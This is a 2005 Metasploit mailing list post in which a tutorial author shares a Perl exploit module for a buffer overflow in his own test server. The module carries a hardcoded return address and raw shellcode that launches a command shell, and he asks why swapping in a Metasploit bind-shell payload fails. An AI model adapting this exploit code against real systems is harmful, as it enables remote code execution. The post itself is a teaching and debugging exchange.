Metasploit mailing list archives
A small Windows problem
From: vmukhi at vsnl.com (Vijay Mukhi)
Date: Fri, 10 Jun 2005 17:12:41 +0530
I am writing a tutorial on MetaSploit at www.vijaymukhi.com. I have a tiny server listening on port 2000 at IP address 70.0.0.2. When I run the following exploit it overruns a 8 byte buffer on my server and opens a DOS box on the server. Being a teacher I try and make my code as easy to understand as possible and hence have hard coded the addresses, 0012ff8c is the address on the stack where my shell code starts. package Msf::Exploit::z; use base "Msf::Exploit"; $info = { 'Payload' => { 'Space' => 1000 }, 'DefaultTarget' => 0, 'Targets' => [ ['Windows 2000 SP0-SP4']] }; sub new { $class = shift; $self = $class->SUPER::new({'Info' => $info}); } sub Exploit { $self = shift; $shellcode = $self->GetVar('EncodedPayload')->Payload; $s = Msf::Socket::Tcp->new('PeerAddr' => '70.0.0.2', 'PeerPort' => 2000); $req = "AAAAAAAAAAAA" . "\x8c\xff\x12\x00" . "\x00\x00\x00\x00" ; $req .= "\x55\x8b\xec\x51\xc7\x45\xfc\x63\x6d\x64\x00\x6a\x05\x8b\xc5\x83\xe8\x04"; $req .= "\x50\xb8\x1d\x9c\x4e\x7c\xff\xd0\x6a\x00\xb8\x1a\xe0\x4e\x7c\xff\xd0"; $s->Send($req); } If I comment out the last two lines and replace them with $req .= $shellcode; I set the payload to win32_bin. When I now run the exploit I expect the system to open a dos box on the machine that I am running my exploit on and connect it to the target machine. nothing happens. what am I doing wrong. any Help or pointers would be higly appreciated. Vijay Mukhi Bombay India -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20050610/c7e4fe3c/attachment.htm>
Current thread:
- A small Windows problem Vijay Mukhi (Jun 10)
- A small Windows problem Jonatan B (Jun 10)